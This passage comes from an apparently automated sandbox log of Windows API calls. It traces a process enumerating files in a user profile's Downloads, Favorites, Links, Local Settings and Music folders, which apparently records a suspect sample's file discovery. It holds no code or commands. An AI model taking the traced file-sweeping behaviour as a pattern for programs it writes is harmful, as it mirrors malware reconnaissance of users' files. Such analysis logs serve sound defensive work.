ftLastWriteTime.dwLowDateTime=0xa61497c0, ftLastWriteTime.dwHighDateTime=0x1d58964, nFileSizeHigh=0x0, nFileSizeLow=0xf569, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sxid0Link-5zZ7dsKVQV.docx", cAlternateFileName="SXID0L~1.DOC")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e88d6f0, ftCreationTime.dwHighDateTime=0x1d5852b, ftLastAccessTime.dwLowDateTime=0xb59b3d20, ftLastAccessTime.dwHighDateTime=0x1d575c3, ftLastWriteTime.dwLowDateTime=0xb59b3d20, ftLastWriteTime.dwHighDateTime=0x1d575c3, nFileSizeHigh=0x0, nFileSizeLow=0x3d0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ulqu akyI-EFV4fSDQDc.pptx", cAlternateFileName="ULQUAK~1.PPT")) returned 1 [0201.041] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c5cae0, ftCreationTime.dwHighDateTime=0x1d5927d, ftLastAccessTime.dwLowDateTime=0x647dca30, ftLastAccessTime.dwHighDateTime=0x1d57bda, ftLastWriteTime.dwLowDateTime=0x647dca30, ftLastWriteTime.dwHighDateTime=0x1d57bda, nFileSizeHigh=0x0, nFileSizeLow=0x14e15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcu-S1_L5cVixC1jBX9Z.pptx", cAlternateFileName="VCU-S1~1.PPT")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a45a90, ftCreationTime.dwHighDateTime=0x1d5a6b3, ftLastAccessTime.dwLowDateTime=0x454a9050, ftLastAccessTime.dwHighDateTime=0x1d5d542, ftLastWriteTime.dwLowDateTime=0x454a9050, ftLastWriteTime.dwHighDateTime=0x1d5d542, nFileSizeHigh=0x0, nFileSizeLow=0x12f05, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w3umcQyTn4DRJs88m7.xlsx", cAlternateFileName="W3UMCQ~1.XLS")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87baf2e0, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0xcdeeea10, ftLastAccessTime.dwHighDateTime=0x1d5dc0d, ftLastWriteTime.dwLowDateTime=0xcdeeea10, ftLastWriteTime.dwHighDateTime=0x1d5dc0d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wx7uR8WZdnzLGz3ii8Q.ods", cAlternateFileName="WX7UR8~1.ODS")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b819640, ftCreationTime.dwHighDateTime=0x1d5dc8c, ftLastAccessTime.dwLowDateTime=0xb4a505f0, ftLastAccessTime.dwHighDateTime=0x1d5e6c4, ftLastWriteTime.dwLowDateTime=0xb4a505f0, ftLastWriteTime.dwHighDateTime=0x1d5e6c4, nFileSizeHigh=0x0, nFileSizeLow=0xd3be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x3z7_eKU3Rz2FWQ.csv", cAlternateFileName="X3Z7_E~1.CSV")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x445df610, ftCreationTime.dwHighDateTime=0x1d5a03f, ftLastAccessTime.dwLowDateTime=0xc4f68370, ftLastAccessTime.dwHighDateTime=0x1d58d69, ftLastWriteTime.dwLowDateTime=0xc4f68370, ftLastWriteTime.dwHighDateTime=0x1d58d69, nFileSizeHigh=0x0, nFileSizeLow=0x1e54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zj3qy-Hilt P.docx", cAlternateFileName="ZJ3QY-~1.DOC")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x445df610, ftCreationTime.dwHighDateTime=0x1d5a03f, ftLastAccessTime.dwLowDateTime=0xc4f68370, ftLastAccessTime.dwHighDateTime=0x1d58d69, ftLastWriteTime.dwLowDateTime=0xc4f68370, ftLastWriteTime.dwHighDateTime=0x1d58d69, nFileSizeHigh=0x0, nFileSizeLow=0x1e54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zj3qy-Hilt P.docx", cAlternateFileName="ZJ3QY-~1.DOC")) returned 0 [0201.042] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.042] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.042] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0201.042] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.042] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.042] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.042] PathFindFileNameW (pszPath="") returned="" [0201.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.042] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0201.043] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.043] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0201.043] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.043] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.043] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.043] PathFindFileNameW (pszPath="") returned="" [0201.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0201.043] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0201.043] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.044] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.044] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0201.044] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.044] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.044] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.044] PathFindFileNameW (pszPath="") returned="" [0201.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0201.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0201.044] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.044] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0201.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.045] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.045] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.045] PathFindFileNameW (pszPath="") returned="" [0201.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.045] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0201.045] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.045] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.045] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.045] PathFindFileNameW (pszPath="") returned="" [0201.045] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.045] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x805cef90, ftCreationTime.dwHighDateTime=0x1d5e26b, ftLastAccessTime.dwLowDateTime=0x12785360, ftLastAccessTime.dwHighDateTime=0x1d5e087, ftLastWriteTime.dwLowDateTime=0x12785360, ftLastWriteTime.dwHighDateTime=0x1d5e087, nFileSizeHigh=0x0, nFileSizeLow=0x14ea6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0tNIoEsMwD.wav", cAlternateFileName="0TNIOE~1.WAV")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0924800, ftCreationTime.dwHighDateTime=0x1d5e1b5, ftLastAccessTime.dwLowDateTime=0xbe804570, ftLastAccessTime.dwHighDateTime=0x1d5d9f5, ftLastWriteTime.dwLowDateTime=0xbe804570, ftLastWriteTime.dwHighDateTime=0x1d5d9f5, nFileSizeHigh=0x0, nFileSizeLow=0x187e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="21GtcRKf ie.wav", cAlternateFileName="21GTCR~1.WAV")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c5b60, ftCreationTime.dwHighDateTime=0x1d5e202, ftLastAccessTime.dwLowDateTime=0x4730e2f0, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0x4730e2f0, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0xe555, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2PCv7S.mp3", cAlternateFileName="")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x194cd520, ftCreationTime.dwHighDateTime=0x1d5e0f6, ftLastAccessTime.dwLowDateTime=0x2bcbf4d0, ftLastAccessTime.dwHighDateTime=0x1d5d99c, ftLastWriteTime.dwLowDateTime=0x2bcbf4d0, ftLastWriteTime.dwHighDateTime=0x1d5d99c, nFileSizeHigh=0x0, nFileSizeLow=0x120b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VqYAySD2Zb-Kepu.wav", cAlternateFileName="5VQYAY~1.WAV")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cad5930, ftCreationTime.dwHighDateTime=0x1d5e524, ftLastAccessTime.dwLowDateTime=0xa1b0ff20, ftLastAccessTime.dwHighDateTime=0x1d5e530, ftLastWriteTime.dwLowDateTime=0xa1b0ff20, ftLastWriteTime.dwHighDateTime=0x1d5e530, nFileSizeHigh=0x0, nFileSizeLow=0x73f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6iJpD.mp3", cAlternateFileName="")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, 